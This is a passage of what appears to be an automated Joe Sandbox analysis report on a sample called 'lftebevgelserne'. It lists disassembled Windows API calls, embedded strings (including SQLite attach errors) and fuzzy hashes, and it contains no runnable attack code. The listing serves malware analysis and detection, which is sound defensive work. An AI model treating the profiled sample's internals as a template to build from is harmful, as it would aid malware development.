                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                      • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                      • GetParent.USER32(?), ref: 00409FA5
                                                      • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                      • String ID:
                                                      • API String ID: 2163313125-0
                                                      • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                      • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                      • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                      • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: free$wcslen
                                                      • String ID:
                                                      • API String ID: 3592753638-3916222277
                                                      • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                      • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                      • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                      • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                      APIs
                                                      • memset.MSVCRT ref: 0040A47B
                                                      • _snwprintf.MSVCRT ref: 0040A4AE
                                                      • wcslen.MSVCRT ref: 0040A4BA
                                                      • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                      • wcslen.MSVCRT ref: 0040A4E0
                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpywcslen$_snwprintfmemset
                                                      • String ID: %s (%s)$YV@
                                                      • API String ID: 3979103747-598926743
                                                      • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                      • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                      • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                      • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                      • wcslen.MSVCRT ref: 0040A6B1
                                                      • wcscpy.MSVCRT ref: 0040A6C1
                                                      • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                      • wcscpy.MSVCRT ref: 0040A6DB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                      • String ID: Unknown Error$netmsg.dll
                                                      • API String ID: 2767993716-572158859
                                                      • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                      • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                      • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                      • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                      APIs
                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                      • wcscpy.MSVCRT ref: 0040DAFB
                                                      • wcscpy.MSVCRT ref: 0040DB0B
                                                      • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                        • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                      • API String ID: 3176057301-2039793938
                                                      • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                      • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                      • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                      • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                      APIs
                                                      Strings
                                                      • database is already attached, xrefs: 0042F721
                                                      • too many attached databases - max %d, xrefs: 0042F64D
                                                      • out of memory, xrefs: 0042F865
                                                      • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                      • cannot ATTACH database within transaction, xrefs: 0042F663
                                                      • database %s is already in use, xrefs: 0042F6C5
                                                      • unable to open database: %s, xrefs: 0042F84E
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpymemset
                                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                      • API String ID: 1297977491-2001300268
                                                      • Opcode ID: 9fef2143278846cd95885c1cbe03afab34c3f4ef307752a183a19874e6a22e95
                                                      • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                      • Opcode Fuzzy Hash: 9fef2143278846cd95885c1cbe03afab34c3f4ef307752a183a19874e6a22e95
                                                      • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                      APIs
                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                      • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                      • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                      • String ID: ($d
                                                      • API String ID: 1140211610-1915259565
                                                      • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                      • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                      • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                      • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                      APIs
                                                      • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                      • Sleep.KERNEL32(00000001), ref: 004178E9
                                                      • GetLastError.KERNEL32 ref: 004178FB
                                                      • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: File$ErrorLastLockSleepUnlock
                                                      • String ID:
                                                      • API String ID: 3015003838-0
                                                      • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                      • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                      • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                      • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                      APIs
                                                      • memset.MSVCRT ref: 00407E44
                                                      • memset.MSVCRT ref: 00407E5B
                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                      • wcscpy.MSVCRT ref: 00407F10
                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                      • String ID:
                                                      • API String ID: 59245283-0
                                                      • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                      • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                      • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                      • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                      APIs
                                                      • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                      • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                      • GetLastError.KERNEL32 ref: 0041855C
                                                      • Sleep.KERNEL32(00000064), ref: 00418571
                                                      • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                      • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                      • GetLastError.KERNEL32 ref: 0041858E
                                                      • Sleep.KERNEL32(00000064), ref: 004185A3
                                                      • free.MSVCRT ref: 004185AC
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesDeleteErrorLastSleep$free
                                                      • String ID:
                                                      • API String ID: 2802642348-0
                                                      • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                      • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                      • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                      • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                      APIs
                                                      • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                      • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                      • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy
                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                      • API String ID: 3510742995-3273207271
                                                      • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                      • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                      • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                      • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                      • memset.MSVCRT ref: 00413ADC
                                                      • memset.MSVCRT ref: 00413AEC
                                                        • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                      • memset.MSVCRT ref: 00413BD7
                                                      • wcscpy.MSVCRT ref: 00413BF8
                                                      • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                      • String ID: 3A
                                                      • API String ID: 3300951397-293699754
                                                      • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                      • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                      • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                      • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                      • wcscpy.MSVCRT ref: 0040D1B5
                                                        • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                        • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                      • wcslen.MSVCRT ref: 0040D1D3
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                      • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                      • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                      • String ID: strings
                                                      • API String ID: 3166385802-3030018805
                                                      • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                      • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                      • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                      • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                      APIs
                                                      • memset.MSVCRT ref: 00411AF6
                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                      • wcsrchr.MSVCRT ref: 00411B14
                                                      • wcscat.MSVCRT ref: 00411B2E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: FileModuleNamememsetwcscatwcsrchr
                                                      • String ID: AE$.cfg$General$EA
                                                      • API String ID: 776488737-1622828088
                                                      • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                      • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                      • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                      • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                      APIs
                                                      • memset.MSVCRT ref: 0040D8BD
                                                      • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                      • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                      • memset.MSVCRT ref: 0040D906
                                                      • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                      • _wcsicmp.MSVCRT ref: 0040D92F
                                                        • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                        • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                      • String ID: sysdatetimepick32
                                                      • API String ID: 1028950076-4169760276
                                                      • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                      • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                      • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                      • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                      APIs
                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                      • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                      • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                      • memset.MSVCRT ref: 0041BA3D
                                                      Strings
                                                      Memory Dump Source
